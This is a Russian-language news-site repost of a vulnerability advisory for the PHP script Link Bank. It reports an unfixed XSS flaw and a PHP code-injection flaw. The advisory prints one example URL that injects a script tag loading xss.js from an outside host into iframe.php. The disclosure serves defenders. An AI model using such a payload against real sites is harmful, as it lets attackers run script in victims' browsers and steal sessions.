Межсайтовый скриптинг и PHP-инклюдинг в Link Bank - «Интернет»
sitename
Anthropic анонсировала ИИ-плагин Claude Design для создания сайтов и презентаций - «Новости мира Интернет»
Anthropic анонсировала ИИ-плагин Claude Design для создания сайтов и презентаций - «Новости мира Интернет»
 Товарные знаки в рекламе: как не нарушить закон и сохранить репутацию
Товарные знаки в рекламе: как не нарушить закон и сохранить репутацию
 В браузер Chrome добавят функцию ускорения загрузки медиа на сайте - «Новости мира Интернет»
В браузер Chrome добавят функцию ускорения загрузки медиа на сайте - «Новости мира Интернет»
 Microsoft представила Xbox PC Remote Tools для удаленной разработки игр на ПК - «Новости мира Интернет»
Microsoft представила Xbox PC Remote Tools для удаленной разработки игр на ПК - «Новости мира Интернет»
 MSI выпустила флагманские игровые ноутбуки Titan 18 Max и Titan 18 Ultra - «Новости мира Интернет»
MSI выпустила флагманские игровые ноутбуки Titan 18 Max и Titan 18 Ultra - «Новости мира Интернет»
 Google выпустила мощную ИИ‑модель Gemma 4 с открытым исходным кодом - «Новости мира Интернет»
Google выпустила мощную ИИ‑модель Gemma 4 с открытым исходным кодом - «Новости мира Интернет»
 Adobe представила Firefly AI Assistant – ИИ для создания контента по описанию - «Новости мира Интернет»
Adobe представила Firefly AI Assistant – ИИ для создания контента по описанию - «Новости мира Интернет»
 Bigme выпустила смартфон HiBreak Dual с двумя экранами - «Новости мира Интернет»
Bigme выпустила смартфон HiBreak Dual с двумя экранами - «Новости мира Интернет»
 Honor выпустила мышь MouseBuds Pro с беспроводными наушниками в корпусе - «Новости мира Интернет»
Honor выпустила мышь MouseBuds Pro с беспроводными наушниками в корпусе - «Новости мира Интернет»
 Свежий рейтинг TIOBE показал снижение доли Python - «Новости мира Интернет»
Свежий рейтинг TIOBE показал снижение доли Python - «Новости мира Интернет»
Новости мира Интернет » Новости » Новости мира Интернет » Межсайтовый скриптинг и PHP-инклюдинг в Link Bank - «Интернет»

✔Межсайтовый скриптинг и PHP-инклюдинг в Link Bank - «Интернет»

19 марта 2024 1 117 Новости / Новости мира Интернет 0

Программа: Link Bank, возможно более ранние версии
Опасность: Критическая
Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "url_name" и "url" во время добавления ссылки. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP код на целевой системе с привилегиями Web сервера. Пример:

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "site" сценария "iframe.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://example.com/iframe.php?site=%3C/title%3E%3C/head
%3E%3Cscript src=http://notlegal.ws/xss.js%3E%3C/script%3E

URL производителя: daverave.64digits.com/index.php?page=linkbank

Решение: Способов устранения уязвимости не существует в настоящее время.


Программа: Link Bank, возможно более ранние версии Опасность: Критическая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на системе. 1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах

Цитирование статьи, картинки - фото скриншот - Rambler News Service.
Иллюстрация к статье - Яндекс. Картинки.
Есть вопросы. Напишите нам.
Общие правила  поведения на сайте.
CSS, Уязвимость выполнить существует произвольный сформированного
запостил(а)
Hancock
Вернуться назад
0

Смотрите также

А что там на главной? )))


Комментарии )))
Забыли пароль? Регистрация